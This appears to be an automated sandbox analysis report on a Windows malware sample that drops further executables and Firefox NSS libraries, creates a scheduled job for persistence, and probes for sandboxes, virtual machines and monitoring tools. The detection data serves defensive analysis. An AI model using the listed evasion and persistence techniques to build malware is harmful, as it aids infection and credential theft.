Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 5189120 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe	Static PE information: Raw size of uftnznnm is bigger than: 0x100000 < 0x2a6400

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2006319453.000000006CC6F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2008434373.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.610000.0.unpack :EW;.rsrc:W;.idata :W;uftnznnm:EW;hqjjgthm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uftnznnm:EW;hqjjgthm:EW;.taggant:EW;
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Unpacked PE file: 16.2.JDGIECGIEB.exe.150000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 17.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 18.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 20.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fkuoncfi:EW;cgsmbisr:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: JDGIECGIEB.exe.0.dr	Static PE information: real checksum: 0x312248 should be: 0x317f63
Source: 931e3b56d4.exe.20.dr	Static PE information: real checksum: 0x1c643d should be: 0xf557c
Source: skotes.exe.16.dr	Static PE information: real checksum: 0x312248 should be: 0x317f63
Source: file.exe	Static PE information: real checksum: 0x502c1d should be: 0x4f322f
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1c643d should be: 0xf557c

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: uftnznnm
Source: file.exe	Static PE information: section name: hqjjgthm
Source: file.exe	Static PE information: section name: .taggant
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name:
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: .idata
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: fkuoncfi
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: cgsmbisr
Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: zhhhapid
Source: random[1].exe.0.dr	Static PE information: section name: ciolgrdz
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: skotes.exe.16.dr	Static PE information: section name: fkuoncfi
Source: skotes.exe.16.dr	Static PE information: section name: cgsmbisr
Source: skotes.exe.16.dr	Static PE information: section name: .taggant
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: .idata
Source: 931e3b56d4.exe.20.dr	Static PE information: section name:
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: zhhhapid
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: ciolgrdz
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_0016D91C push ecx; ret	16_2_0016D92F
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Code function: 16_2_00161359 push es; ret	16_2_0016135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_005CD91C push ecx; ret	17_2_005CD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_005CD91C push ecx; ret	18_2_005CD92F

Source: JDGIECGIEB.exe.0.dr	Static PE information: section name: entropy: 7.128626721102462
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.977234668888621
Source: random[1].exe.0.dr	Static PE information: section name: zhhhapid entropy: 7.923467527322307
Source: skotes.exe.16.dr	Static PE information: section name: entropy: 7.128626721102462
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: entropy: 7.977234668888621
Source: 931e3b56d4.exe.20.dr	Static PE information: section name: zhhhapid entropy: 7.923467527322307

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\JDGIECGIEB.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\JDGIECGIEB.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\JDGIECGIEB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\JDGIECGIEB.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\JDGIECGIEB.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85FBFC second address: 85FC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85FC00 second address: 85FC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DE9ED second address: 9DE9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DE9F2 second address: 9DE9F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDE03 second address: 9DDE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDE07 second address: 9DDE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDF94 second address: 9DDFAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4465131BD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFC8A second address: 9DFD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push ebx 0x0000000b jmp 00007F44646ECA56h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 add ecx, dword ptr [ebp+122D2B48h] 0x00000018 lea ebx, dword ptr [ebp+12453A8Ah] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F44646ECA48h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 sub ecx, dword ptr [ebp+122D1F45h] 0x0000003e jmp 00007F44646ECA57h 0x00000043 push eax 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F44646ECA4Ch 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFDEE second address: 9DFDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFDF2 second address: 9DFE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F44646ECA4Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push edi 0x0000000f jmp 00007F44646ECA55h 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a je 00007F44646ECA5Eh 0x00000020 jmp 00007F44646ECA58h 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a ja 00007F44646ECA46h 0x00000030 rdtsc
